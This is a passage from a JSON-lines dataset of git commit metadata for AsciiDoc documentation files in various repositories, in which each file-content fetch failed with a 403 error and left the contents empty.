'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b46ede17fce488ff8d3b43ab10291c4cd3a8bda","subject":"KUDU-811: gflag style guide","message":"KUDU-811: gflag style guide\n\nThis will be used for future gflags as well as for a massive overhaul of\nexisting ones.\n\nChange-Id: I5b18bd3bbb223a64272ba37ef77b3f25f512fa65\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7380\nTested-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/contributing.adoc","new_file":"docs\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5a054bd156acf2c9678acd3d42bf41445fb22a9","subject":"add reference doc","message":"add reference doc\n","repos":"markllama\/lisa17,markllama\/lisa17","old_file":"REFERENCES.adoc","new_file":"REFERENCES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/lisa17.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29c895be546d12f9327a1342ca858ab9da785bbc","subject":"Documentacion","message":"Documentacion\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/best_practices\/best_practices.asciidoc","new_file":"fermat-documentation\/fermat_dap\/best_practices\/best_practices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a6206e45da4b0d3f988823ad147be0966d3b646","subject":"Add PBR article part two","message":"Add PBR article part two","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part2.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"8f0210729e9ab58f1287388a353c8176da330f72","subject":"docs(presenation): add license documentation","message":"docs(presenation): add license documentation\n","repos":"bentolor\/microframeworks-showcase,bentolor\/microframeworks-showcase,bentolor\/microframeworks-showcase","old_file":"docs\/img\/LICENSES.adoc","new_file":"docs\/img\/LICENSES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bentolor\/microframeworks-showcase.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4d26a72fe3a1c98be2a43e2d4afc2002df7e7ad2","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acf695e190c29d6fbe8e33009bb30e45be496e9f","subject":"Update 2018-01-09-Flutter-Report-January-2018.adoc","message":"Update 2018-01-09-Flutter-Report-January-2018.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-09-Flutter-Report-January-2018.adoc","new_file":"_posts\/2018-01-09-Flutter-Report-January-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f7a07a61368609e5a46107bbe597566cdb7f42c","subject":"y2b create post PS3 Slim Unboxing - PRICE DROP!","message":"y2b create post PS3 Slim Unboxing - PRICE DROP!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-21-PS3-Slim-Unboxing--PRICE-DROP.adoc","new_file":"_posts\/2011-10-21-PS3-Slim-Unboxing--PRICE-DROP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ad3b16ba4dd632ff14bf609b6c5ea92bc2e214b","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ca6f50014506f93cf205e99bea55e8d89bf21e2","subject":"y2b create post $3 Beer Can vs $200 Beer Gadget","message":"y2b create post $3 Beer Can vs $200 Beer Gadget","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-01-3-Beer-Can-vs-200-Beer-Gadget.adoc","new_file":"_posts\/2017-01-01-3-Beer-Can-vs-200-Beer-Gadget.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c96eada1a9ec43db64bbf8fd6d6905dfeee4a69e","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"st33n\/cv,st33n\/cv","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/st33n\/cv.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51c9387fcdb3cc9840d7f267f447ea7a334d2eeb","subject":"working on readme file","message":"working on readme file\n","repos":"leonardoce\/predo,leonardoce\/predo","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leonardoce\/predo.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9d20868fea27da833cad1bcd6da7e93fb2809bea","subject":"Clarify max_connections + NbAcceptors + backlog in the guide","message":"Clarify max_connections + NbAcceptors + backlog in the guide\n","repos":"layerhq\/ranch,ninenines\/ranch,K2InformaticsGmbH\/ranch","old_file":"doc\/src\/guide\/listeners.asciidoc","new_file":"doc\/src\/guide\/listeners.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/K2InformaticsGmbH\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"99d9b088beb3746d47ca439df7200ec71b852143","subject":"Create 2015-09-01-forge-2.19.0.final.asciidoc","message":"Create 2015-09-01-forge-2.19.0.final.asciidoc","repos":"luiz158\/docs,forge\/docs,forge\/docs,luiz158\/docs","old_file":"news\/2015-09-01-forge-2.19.0.final.asciidoc","new_file":"news\/2015-09-01-forge-2.19.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9297a5e1b250bd8b03188900662c90e8a4b0bf1a","subject":"Configuring providers guide","message":"Configuring providers guide\n\nCo-authored-by: Stian Thorgersen <stian@redhat.com>\n\nCloses #10400\n","repos":"srose\/keycloak,stianst\/keycloak,reneploetz\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,raehalme\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,keycloak\/keycloak,keycloak\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,thomasdarimont\/keycloak,stianst\/keycloak,raehalme\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,jpkrohling\/keycloak,stianst\/keycloak,raehalme\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,hmlnarik\/keycloak,reneploetz\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,abstractj\/keycloak,hmlnarik\/keycloak,keycloak\/keycloak,mhajas\/keycloak,srose\/keycloak,srose\/keycloak,keycloak\/keycloak,thomasdarimont\/keycloak,ahus1\/keycloak,abstractj\/keycloak,mhajas\/keycloak,ahus1\/keycloak,ahus1\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,jpkrohling\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,srose\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,srose\/keycloak,abstractj\/keycloak,ahus1\/keycloak,stianst\/keycloak,raehalme\/keycloak","old_file":"docs\/guides\/src\/main\/server\/configuration-provider.adoc","new_file":"docs\/guides\/src\/main\/server\/configuration-provider.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f079f7dd8a3cbc091cbfd446fe4b09996e863b5f","subject":"y2b create post Koss TBSE1 Headphones Unboxing (Tony Bennett Signature Edition)","message":"y2b create post Koss TBSE1 Headphones Unboxing (Tony Bennett Signature Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-15-Koss-TBSE1-Headphones-Unboxing-Tony-Bennett-Signature-Edition.adoc","new_file":"_posts\/2012-03-15-Koss-TBSE1-Headphones-Unboxing-Tony-Bennett-Signature-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f98886e293839caa9886c9bdfb22b70d4af029ec","subject":"Added a Technology Preview module","message":"Added a Technology Preview module\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/technology-preview.adoc","new_file":"modules\/technology-preview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"307a16bdd1b4a4b34b33eda3c3d5f5c1061129d4","subject":"y2b create post Saints Row 3 \\\/ Assassins Creed Revelations MIDNIGHT LAUNCH!","message":"y2b create post Saints Row 3 \\\/ Assassins Creed Revelations MIDNIGHT LAUNCH!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-14-Saints-Row-3--Assassins-Creed-Revelations-MIDNIGHT-LAUNCH.adoc","new_file":"_posts\/2011-11-14-Saints-Row-3--Assassins-Creed-Revelations-MIDNIGHT-LAUNCH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"953928b2c5734b4e274040cf46aecd3b31c399eb","subject":"typo fix (it self -> itself) (#21781)","message":"typo fix (it self -> itself) (#21781)\n\n* typo fix.\r\n\r\n* apply \"stored field value\"\r\n\r\n* replaced \"whereas\" with \"on the contrary\"\r\n","repos":"glefloch\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,fernandozhu\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,JSCooke\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,henakamaMSFT\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ZTE-PaaS\/elasticsearch,uschindler\/elasticsearch,nazarewk\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,s1monw\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,MisterAndersen\/elasticsearch,artnowo\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Helen-Zhao\/elasticsearch,spiegela\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,henakamaMSFT\/elasticsearch,alexshadow007\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,fforbeck\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,sneivandt\/elasticsearch,nilabhsagar\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,wuranbo\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,mortonsykes\/elasticsearch,Helen-Zhao\/elasticsearch,vroyer\/elassandra,mjason3\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,JackyMai\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,C-Bish\/elasticsearch,scorpionvicky\/elasticsearch,C-Bish\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,umeshdangat\/elasticsearch,jimczi\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,njlawton\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,wuranbo\/elasticsearch,nazarewk\/elasticsearch,alexshadow007\/elasticsearch,fred84\/elasticsearch,obourgain\/elasticsearch,fernandozhu\/elasticsearch,alexshadow007\/elasticsearch,kalimatas\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,HonzaKral\/elasticsearch,wuranbo\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,bawse\/elasticsearch,nazarewk\/elasticsearch,LeoYao\/elasticsearch,rlugojr\/elasticsearch,LewayneNaidoo\/elasticsearch,nazarewk\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra,henakamaMSFT\/elasticsearch,jprante\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,IanvsPoplicola\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,nezirus\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,spiegela\/elasticsearch,JSCooke\/elasticsearch,markwalkom\/elasticsearch,JSCooke\/elasticsearch,Shepard1212\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,glefloch\/elasticsearch,bawse\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,maddin2016\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,Helen-Zhao\/elasticsearch,jprante\/elasticsearch,umeshdangat\/elasticsearch,bawse\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,shreejay\/elasticsearch,obourgain\/elasticsearch,sneivandt\/elasticsearch,elasticdog\/elasticsearch,StefanGor\/elasticsearch,nilabhsagar\/elasticsearch,ZTE-PaaS\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,glefloch\/elasticsearch,a2lin\/elasticsearch,fred84\/elasticsearch,geidies\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,henakamaMSFT\/elasticsearch,nilabhsagar\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,LewayneNaidoo\/elasticsearch,LeoYao\/elasticsearch,a2lin\/elasticsearch,StefanGor\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,jprante\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,Shepard1212\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,markwalkom\/elasticsearch,elasticdog\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,geidies\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,nezirus\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,henakamaMSFT\/elasticsearch,jimczi\/elasticsearch,bawse\/elasticsearch,fernandozhu\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,lks21c\/elasticsearch,nilabhsagar\/elasticsearch,elasticdog\/elasticsearch,mohit\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,StefanGor\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,rlugojr\/elasticsearch,wuranbo\/elasticsearch,MaineC\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,nknize\/elasticsearch,Shepard1212\/elasticsearch,alexshadow007\/elasticsearch,gfyoung\/elasticsearch,artnowo\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,LewayneNaidoo\/elasticsearch,masaruh\/elasticsearch,MaineC\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,HonzaKral\/elasticsearch,shreejay\/elasticsearch,C-Bish\/elasticsearch,rlugojr\/elasticsearch,scorpionvicky\/elasticsearch,njlawton\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,artnowo\/elasticsearch,JackyMai\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,JackyMai\/elasticsearch,mikemccand\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,nknize\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,MaineC\/elasticsearch,i-am-Nathan\/elasticsearch,masaruh\/elasticsearch,vroyer\/elasticassandra,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,pozhidaevak\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,winstonewert\/elasticsearch,vroyer\/elassandra,spiegela\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,HonzaKral\/elasticsearch,Shepard1212\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,spiegela\/elasticsearch,njlawton\/elasticsearch,MisterAndersen\/elasticsearch","old_file":"docs\/reference\/search\/request\/stored-fields.asciidoc","new_file":"docs\/reference\/search\/request\/stored-fields.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff7cbb28f1ce36304acfd65af9051d2742f0e3d3","subject":"Update 2017-01-10-RICHTIGSTELLUNG.adoc","message":"Update 2017-01-10-RICHTIGSTELLUNG.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-10-RICHTIGSTELLUNG.adoc","new_file":"_posts\/2017-01-10-RICHTIGSTELLUNG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3ea01904dcdb55463130d9f2bd01d84ce31148b","subject":"Update 2019-01-31-Wolfgang-Reszel.adoc","message":"Update 2019-01-31-Wolfgang-Reszel.adoc","repos":"Tekl\/tekl.github.io,Tekl\/tekl.github.io,Tekl\/tekl.github.io,Tekl\/tekl.github.io","old_file":"_posts\/2019-01-31-Wolfgang-Reszel.adoc","new_file":"_posts\/2019-01-31-Wolfgang-Reszel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Tekl\/tekl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cf387650d83d3abba9818455ba71e1c00b625df","subject":"Update 2016-05-17-Da-skolko-mozhno-uzhe-s-etimi-dvunapravlennymi-svyazyami.adoc","message":"Update 2016-05-17-Da-skolko-mozhno-uzhe-s-etimi-dvunapravlennymi-svyazyami.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-17-Da-skolko-mozhno-uzhe-s-etimi-dvunapravlennymi-svyazyami.adoc","new_file":"_posts\/2016-05-17-Da-skolko-mozhno-uzhe-s-etimi-dvunapravlennymi-svyazyami.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df4722dea1fade4cd6c7c5d5dd725b62fdabc722","subject":"Update manual.adoc","message":"Update manual.adoc","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain","old_file":"src\/docs\/manual.adoc","new_file":"src\/docs\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5700aa29fcc8c9ad55580364cc402ec9e9a13aea","subject":"Update 2015-02-20-Manual-de-Git-En-Espanol.adoc","message":"Update 2015-02-20-Manual-de-Git-En-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-20-Manual-de-Git-En-Espanol.adoc","new_file":"_posts\/2015-02-20-Manual-de-Git-En-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45b2d75d7a3abc1ecd71d3f3253e7481a6369406","subject":"Create README.adoc","message":"Create README.adoc","repos":"Jiri-Kremser\/hawkular-agent,pilhuhn\/hawkular-agent,hawkular\/hawkular-agent,Jiri-Kremser\/hawkular-agent,hawkular\/hawkular-agent,pilhuhn\/hawkular-agent,jpkrohling\/hawkular-agent,Jiri-Kremser\/hawkular-agent,hawkular\/hawkular-agent,pilhuhn\/hawkular-agent,jpkrohling\/hawkular-agent","old_file":"hawkular-wildfly-agent-itest-parent\/hawkular-wildfly-agent-command-cli\/README.adoc","new_file":"hawkular-wildfly-agent-itest-parent\/hawkular-wildfly-agent-command-cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpkrohling\/hawkular-agent.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c525928a4e257e2a764adf51f9be10265c81636d","subject":"Update 2017-09-04-Ethereum.adoc","message":"Update 2017-09-04-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-04-Ethereum.adoc","new_file":"_posts\/2017-09-04-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5066dd110e11cbb060c13a34ea3b058a29c16274","subject":"y2b create post Is This Ear Technology The Future?","message":"y2b create post Is This Ear Technology The Future?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-21-Is-This-Ear-Technology-The-Future.adoc","new_file":"_posts\/2016-12-21-Is-This-Ear-Technology-The-Future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"093216f3194f46830d55045f521a2a04d02c42bc","subject":"Update 